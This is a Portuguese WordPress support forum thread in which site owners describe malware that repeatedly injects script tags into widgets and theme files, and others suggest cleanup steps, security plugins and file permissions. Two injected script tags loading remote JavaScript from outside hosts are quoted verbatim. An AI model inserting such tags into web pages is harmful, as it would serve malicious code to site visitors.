Suporte » Ajustando o WordPress » malware wordpress

  • Resolvido paulohpf

    (@paulohpf)


    Ola,
    Estou com um problema no meu site q ele aparece uns scripts desse tipo:

    <script type="text/javascript" src="http://asaunirg.com.br/js/0day.php"></script>

    Ja atualizei a pagina e procurei por arquivos modificados mais eu não consigo encontrar o virus!!
    ele fica adicionando o codigo nos widgets e se deixar adiciona no cogigo da pagina…
    estou desesperado porque se eu tiver que reinstalar a pagina vou ter trabalho com os plugins e posts…
    alguem ai da uma luz pelamordeDeus!!

    a pagina eh http://www.betel-bauru.com.br

    Abraço

Visualizando 15 respostas - 1 até 15 (de um total de 36)
  • feliperfranco

    (@feliperfranco)

    Estou com o mesmo problema… comigo esta acontecendo na pagina de posts do wordpress, especificamente na pagina http://www.benficario.com.br/projetos/

    Toda semana eu retiro o codigo que sempre aparece na pagina index.php do meu tema.

    Alguem ajude-nos!

    paulohpf

    (@paulohpf)

    Legal! agora ferrou!
    http://www.jovens.betel-bauru.com.br
    a pagina foi bloqueada pelo google…

    Entre em contato com sua hospedagem e peça um backup do site do dia anterior ao ataque e pronto. Após isso, leia esse tópico e use suas dicas:

    http://www.slideshare.net/flavioaugustosilveira/por-um-wordpress-mais-seguro-13354465

    Espero ter ajudado, mantenha-nos informados

    gsimonete

    (@gsimonete)

    Pessoal para retirar o codigo vcs devem acessar o editor do tema e ir a opcao index.php, agora quanto a nao sofrer novos ataques vcs devem solicitar ao provedor que altere a permissão do arquivo

    paulohpf

    (@paulohpf)

    então!
    eu já alterei a permissão do arquivo index.php e de todos os arquivos do wordpress…
    mais o problema eh que esse virus está aparecendo direto no menu de widgets… eu ja substitui o sistema por um “limpo” mais ele continua aparecendo… isso seria um ataque externo?

    gsimonete

    (@gsimonete)

    sim e um ataque externo, eu estou tendo os mesmos ataques, e procurando uma solução

    paulohpf

    (@paulohpf)

    no site principal q eh http://www.betel-bauru.com.br eu tive que re-instalar o sistema inteiro para esse troço parar de aparecer no widgets… eu tentei trocar a chave de autenticação de user e mesmo assim o ataque continuou…

    Pode ser tema ou plugin pirateado ou que está usando funções vulneráveis.

    Ver Site Invadido

    Olha.. editando o site de uma amiga..

    O Caminho de entrada PODE ter sido o Timthumb e depois ele conseguiu LOGAR no WordPress

    Estou dando uma geral no código.. mas já ta claro que o sujeito LOGAVA no WordPress

    Eu resolvi o problema da seguinte maneira

    • Atualizei todo o wordpress e os plugins
    • Instalei os seguintes plugins WP Security Scan, AntiVirus e Wordfence Security
    • Eliminei todas as vulnerabilidades que eles encontraram e o problema parou de ocorrer

    Espero ter ajudado. Valeu!

    Conheço este problema trata-se de um Widget Injection feito pelo Java em sua máquina..

    em minha maquina? e como resolver o problema?

    tb estou tendo o mesmo problema….

    no index.php do meu tema (mesmo apagando) sempre aparece o seguinte:

    <script src=”http://87.106.35.192/br/flashplayer/download/”></script>

    desconfio que seja por conta do tema que não é atualizado já faz um tempo…

    ME AJUDEMMMMMMMM !!!

    Faça assim… no FTP trave a edição dos arquivos do Tema para que não possam ser alterados… aq foi um dos problemas que resolveu

    Mudando a permissão, correto?

    Como a deixo então?

    644? 444 ?

    Valeu!!!

Visualizando 15 respostas - 1 até 15 (de um total de 36)
  • O tópico ‘malware wordpress’ está fechado para novas respostas.